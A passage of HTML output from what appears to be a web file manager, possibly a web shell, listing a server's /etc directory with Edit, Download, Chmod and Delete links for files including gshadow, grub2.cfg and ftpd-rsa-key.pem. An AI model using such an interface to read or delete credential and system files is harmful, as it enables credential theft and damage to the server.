                            </div></td>
                        </tr>
                                            <tr data-name="exim_excludesender_mailchannels">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_excludesender_mailchannels" class="file-link">📄 exim_excludesender_mailchannels</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_excludesender_mailchannels" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim_excludesender_mailchannels" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim_excludesender_mailchannels','exim_excludesender_mailchannels')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim_excludesender_mailchannels','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim_excludesender_mailchannels',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim_suspended_list">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_suspended_list" class="file-link">📄 exim_suspended_list</a></td>
                            <td class="size">715 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_suspended_list" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim_suspended_list" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim_suspended_list','exim_suspended_list')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim_suspended_list','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim_suspended_list',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exim_trusted_configs">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_trusted_configs" class="file-link">📄 exim_trusted_configs</a></td>
                            <td class="size">24 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:08</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexim_trusted_configs" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexim_trusted_configs" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exim_trusted_configs','exim_trusted_configs')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exim_trusted_configs','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exim_trusted_configs',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="eximmailtrap">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximmailtrap" class="file-link">📄 eximmailtrap</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximmailtrap" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Feximmailtrap" class="action-button">Download</a>
                                <button onclick="showRename('/etc/eximmailtrap','eximmailtrap')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/eximmailtrap','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/eximmailtrap',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="eximrejecthelo">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximrejecthelo" class="file-link">📄 eximrejecthelo</a></td>
                            <td class="size">37 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximrejecthelo" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Feximrejecthelo" class="action-button">Download</a>
                                <button onclick="showRename('/etc/eximrejecthelo','eximrejecthelo')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/eximrejecthelo','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/eximrejecthelo',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="eximrejects">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximrejects" class="file-link">📄 eximrejects</a></td>
                            <td class="size">225 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximrejects" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Feximrejects" class="action-button">Download</a>
                                <button onclick="showRename('/etc/eximrejects','eximrejects')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/eximrejects','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/eximrejects',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="eximrejects.rpmorig">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximrejects.rpmorig" class="file-link">📄 eximrejects.rpmorig</a></td>
                            <td class="size">367 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Feximrejects.rpmorig" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Feximrejects.rpmorig" class="action-button">Download</a>
                                <button onclick="showRename('/etc/eximrejects.rpmorig','eximrejects.rpmorig')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/eximrejects.rpmorig','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/eximrejects.rpmorig',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exports">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexports" class="file-link">📄 exports</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fexports" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fexports" class="action-button">Download</a>
                                <button onclick="showRename('/etc/exports','exports')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exports','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exports',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="favicon.png">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffavicon.png" class="file-link">📄 favicon.png</a></td>
                            <td class="size">226 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2021-04-11 10:32</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffavicon.png" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ffavicon.png" class="action-button">Download</a>
                                <button onclick="showRename('/etc/favicon.png','favicon.png')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/favicon.png','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/favicon.png',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="filesystems">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffilesystems" class="file-link">📄 filesystems</a></td>
                            <td class="size">66 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffilesystems" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ffilesystems" class="action-button">Download</a>
                                <button onclick="showRename('/etc/filesystems','filesystems')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/filesystems','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/filesystems',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="freetds.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffreetds.conf" class="file-link">📄 freetds.conf</a></td>
                            <td class="size">1.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-10-07 15:47</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffreetds.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ffreetds.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/freetds.conf','freetds.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/freetds.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/freetds.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="freshclam.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffreshclam.conf" class="file-link">📄 freshclam.conf</a></td>
                            <td class="size">8.8 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffreshclam.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ffreshclam.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/freshclam.conf','freshclam.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/freshclam.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/freshclam.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="fstab">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffstab" class="file-link">📄 fstab</a></td>
                            <td class="size">1.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-11-20 17:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffstab" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ffstab" class="action-button">Download</a>
                                <button onclick="showRename('/etc/fstab','fstab')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/fstab','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/fstab',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ftpd-ca.pem">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fftpd-ca.pem" class="file-link">📄 ftpd-ca.pem</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2025-09-01 07:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fftpd-ca.pem" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fftpd-ca.pem" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ftpd-ca.pem','ftpd-ca.pem')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ftpd-ca.pem','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ftpd-ca.pem',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ftpd-rsa-key.pem">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fftpd-rsa-key.pem" class="file-link">📄 ftpd-rsa-key.pem</a></td>
                            <td class="size">1.6 KB</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fftpd-rsa-key.pem" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fftpd-rsa-key.pem" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ftpd-rsa-key.pem','ftpd-rsa-key.pem')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ftpd-rsa-key.pem','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ftpd-rsa-key.pem',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ftpd-rsa.pem">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fftpd-rsa.pem" class="file-link">📄 ftpd-rsa.pem</a></td>
                            <td class="size">8.4 KB</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2026-05-29 17:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fftpd-rsa.pem" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fftpd-rsa.pem" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ftpd-rsa.pem','ftpd-rsa.pem')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ftpd-rsa.pem','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ftpd-rsa.pem',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="fuse.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffuse.conf" class="file-link">📄 fuse.conf</a></td>
                            <td class="size">38 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-10-02 19:31</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Ffuse.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Ffuse.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/fuse.conf','fuse.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/fuse.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/fuse.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="grafana-agent.yaml">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgrafana-agent.yaml" class="file-link">📄 grafana-agent.yaml</a></td>
                            <td class="size">12.8 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 15:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgrafana-agent.yaml" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgrafana-agent.yaml" class="action-button">Download</a>
                                <button onclick="showRename('/etc/grafana-agent.yaml','grafana-agent.yaml')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/grafana-agent.yaml','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/grafana-agent.yaml',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="greylist_common_mail_providers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgreylist_common_mail_providers" class="file-link">📄 greylist_common_mail_providers</a></td>
                            <td class="size">30 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 03:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgreylist_common_mail_providers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgreylist_common_mail_providers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/greylist_common_mail_providers','greylist_common_mail_providers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/greylist_common_mail_providers','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/greylist_common_mail_providers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="greylist_trusted_netblocks">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgreylist_trusted_netblocks" class="file-link">📄 greylist_trusted_netblocks</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgreylist_trusted_netblocks" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgreylist_trusted_netblocks" class="action-button">Download</a>
                                <button onclick="showRename('/etc/greylist_trusted_netblocks','greylist_trusted_netblocks')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/greylist_trusted_netblocks','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/greylist_trusted_netblocks',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="group">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgroup" class="file-link">📄 group</a></td>
                            <td class="size">16.0 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgroup" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgroup" class="action-button">Download</a>
                                <button onclick="showRename('/etc/group','group')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/group','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/group',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="group-">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgroup-" class="file-link">📄 group-</a></td>
                            <td class="size">15.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-11-18 09:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgroup-" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgroup-" class="action-button">Download</a>
                                <button onclick="showRename('/etc/group-','group-')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/group-','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/group-',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="grub2.cfg">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgrub2.cfg" class="file-link">📄 grub2.cfg</a></td>
                            <td class="size">5.8 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-02-25 15:31</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgrub2.cfg" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgrub2.cfg" class="action-button">Download</a>
                                <button onclick="showRename('/etc/grub2.cfg','grub2.cfg')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/grub2.cfg','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/grub2.cfg',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gshadow">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgshadow" class="file-link">📄 gshadow</a></td>
                            <td class="size">12.3 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-15 12:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgshadow" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgshadow" class="action-button">Download</a>
                                <button onclick="showRename('/etc/gshadow','gshadow')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gshadow','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gshadow',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="gshadow-">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgshadow-" class="file-link">📄 gshadow-</a></td>
                            <td class="size">11.9 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-11-18 09:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fgshadow-" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fgshadow-" class="action-button">Download</a>
                                <button onclick="showRename('/etc/gshadow-','gshadow-')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/gshadow-','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/gshadow-',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="host.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhost.conf" class="file-link">📄 host.conf</a></td>
                            <td class="size">9 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhost.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fhost.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/host.conf','host.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/host.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/host.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="hostname">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhostname" class="file-link">📄 hostname</a></td>
                            <td class="size">25 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 14:57</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhostname" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fhostname" class="action-button">Download</a>
                                <button onclick="showRename('/etc/hostname','hostname')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/hostname','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/hostname',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="hosts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhosts" class="file-link">📄 hosts</a></td>
                            <td class="size">1.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhosts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fhosts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/hosts','hosts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/hosts','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/hosts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="hosts.1756739349">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhosts.1756739349" class="file-link">📄 hosts.1756739349</a></td>
                            <td class="size">581 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhosts.1756739349" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fhosts.1756739349" class="action-button">Download</a>
                                <button onclick="showRename('/etc/hosts.1756739349','hosts.1756739349')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/hosts.1756739349','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/hosts.1756739349',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="hosts.1756739712">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhosts.1756739712" class="file-link">📄 hosts.1756739712</a></td>
                            <td class="size">1.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fhosts.1756739712" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fhosts.1756739712" class="action-button">Download</a>
                                <button onclick="showRename('/etc/hosts.1756739712','hosts.1756739712')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/hosts.1756739712','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/hosts.1756739712',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="idmapd.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fidmapd.conf" class="file-link">📄 idmapd.conf</a></td>
                            <td class="size">5.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-08 16:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fidmapd.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fidmapd.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/idmapd.conf','idmapd.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/idmapd.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/idmapd.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="incron.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fincron.conf" class="file-link">📄 incron.conf</a></td>
                            <td class="size">1.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2015-02-09 09:03</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fincron.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fincron.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/incron.conf','incron.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/incron.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/incron.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="inittab">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Finittab" class="file-link">📄 inittab</a></td>
                            <td class="size">490 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Finittab" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Finittab" class="action-button">Download</a>
                                <button onclick="showRename('/etc/inittab','inittab')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/inittab','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/inittab',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="inputrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Finputrc" class="file-link">📄 inputrc</a></td>
                            <td class="size">943 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Finputrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Finputrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/inputrc','inputrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/inputrc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/inputrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="inrbld">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Finrbld" class="file-link">📄 inrbld</a></td>
                            <td class="size">200 B</td>
                            <td><span class="permissions">0660</span></td>
                            <td>2026-08-06 03:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Finrbld" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Finrbld" class="action-button">Download</a>
                                <button onclick="showRename('/etc/inrbld','inrbld')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/inrbld','0660')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/inrbld',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ipaddrpool">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fipaddrpool" class="file-link">📄 ipaddrpool</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fipaddrpool" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fipaddrpool" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ipaddrpool','ipaddrpool')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ipaddrpool','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ipaddrpool',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fips" class="file-link">📄 ips</a></td>
                            <td class="size">80 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-04 21:16</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ips','ips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ips','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="issue">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fissue" class="file-link">📄 issue</a></td>
                            <td class="size">23 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fissue" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fissue" class="action-button">Download</a>
                                <button onclick="showRename('/etc/issue','issue')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/issue','0644')" class="action-button">Chmod</button>
